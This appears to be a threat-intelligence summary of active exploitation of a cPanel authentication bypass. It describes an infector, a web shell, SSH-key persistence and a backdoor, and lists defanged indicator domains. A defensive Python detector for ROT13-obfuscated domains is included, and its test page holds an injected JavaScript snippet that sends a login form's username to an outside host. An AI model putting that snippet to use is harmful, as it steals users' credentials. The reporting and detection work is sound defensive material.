
Active exploitation of cPanel authentication bypass (CVE-2026-41940) delivering Filemanager backdoor

1 unique source, 1 article

Summary


A threat actor identified as Mr_Rot13 is actively exploiting CVE-2026-41940, a critical authentication bypass vulnerability in cPanel and WebHost Manager (WHM), to deploy a backdoor named Filemanager across compromised environments. The flaw enables remote attackers to gain elevated control of cPanel instances, leading to post-exploitation activities including cryptocurrency mining, ransomware deployment, botnet propagation, and persistent backdoor implantation. The attack chain involves shell scripts fetching a Go-based infector from cp.dene.[de[.]com, which installs an SSH public key for persistence, drops a PHP web shell for remote command execution, and injects JavaScript into login pages to harvest credentials via a ROT13-encoded domain (wrned[.]com). The final payload is a cross-platform backdoor capable of infecting Windows, macOS, and Linux systems.
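A defender-side check for the login-page credential-harvesting stage described above, added here as an example and not code from the source article: it scans the inline scripts of a login page for string literals that become a domain name once ROT13 is applied, the obfuscation the summary attributes to the injected JavaScript. The sample page, the injected script and the TLD list are constructed assumptions; the only indicator taken from the summary is wrned[.]com.

```python
import codecs
import re

# Indicator named in the event summary, refanged for matching.
KNOWN_EXFIL_DOMAINS = {"wrned.com"}
# Small TLD set used to cut false positives; an assumption, extend as needed.
COMMON_TLDS = {"com", "net", "org", "io", "ru", "de", "top", "xyz"}

SCRIPT_RE = re.compile(r"<script\b[^>]*>(.*?)</script>", re.I | re.S)
STRING_RE = re.compile(r"""(["'])((?:\\.|(?!\1).)*)\1""")
DOMAIN_RE = re.compile(r"^(?:[a-z0-9-]+\.)+([a-z]{2,})$", re.I)

# Constructed sample: a cPanel-style login form plus a hypothetical injected
# script that hides its beacon host as a ROT13 string and decodes it at runtime.
SAMPLE_LOGIN_PAGE = """<html><body>
<form id="login_form" action="/login/" method="post">
  <input name="user"><input name="pass" type="password">
</form>
<script src="/cpanel_magic_revision_0/assets/login.js"></script>
<script>
var _h = "jearq.pbz".replace(/[a-z]/g, function (c) {
  return String.fromCharCode((c <= "Z" ? 90 : 122) >= (c = c.charCodeAt(0) + 13) ? c : c - 26);
});
document.getElementById("login_form").addEventListener("submit", function () {
  var i = new Image();
  i.src = "https://" + _h + "/c.php?u=" + encodeURIComponent(document.forms[0].user.value);
});
</script>
</body></html>"""


def find_rot13_domains(html):
    """Return (encoded_literal, decoded_domain, is_known_indicator) for every
    string literal in an inline <script> that turns into a domain under ROT13."""
    hits = []
    for script in SCRIPT_RE.findall(html):
        for _quote, literal in STRING_RE.findall(script):
            decoded = codecs.encode(literal, "rot_13")  # ROT13 is its own inverse
            m = DOMAIN_RE.match(decoded)
            if m and m.group(1).lower() in COMMON_TLDS:
                hits.append((literal, decoded, decoded.lower() in KNOWN_EXFIL_DOMAINS))
    return hits


if __name__ == "__main__":
    for encoded, decoded, known in find_rot13_domains(SAMPLE_LOGIN_PAGE):
        flag = "KNOWN INDICATOR" if known else "suspicious"
        print(f"{flag}: {encoded!r} -> {decoded}")
```

Run it against the login templates under a cPanel installation's document root; any hit that is not a known indicator still deserves a look, since legitimate code rarely stores hostnames in ROT13.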

Timeline

  1. 11.05.2026 20:54 · 1 article

    Mr_Rot13 exploits cPanel authentication bypass (CVE-2026-41940) to deploy Filemanager backdoor

    Active exploitation of CVE-2026-41940 by threat actor Mr_Rot13 began shortly after public disclosure, with observed campaigns delivering a Go-based infector that implants persistence mechanisms (SSH public key), a PHP web shell for remote operations, and a cross-platform Filemanager backdoor. The backdoor supports file management, remote command execution, and data collection, including credentials and host information, exfiltrated to attacker-controlled domains and a Telegram group.
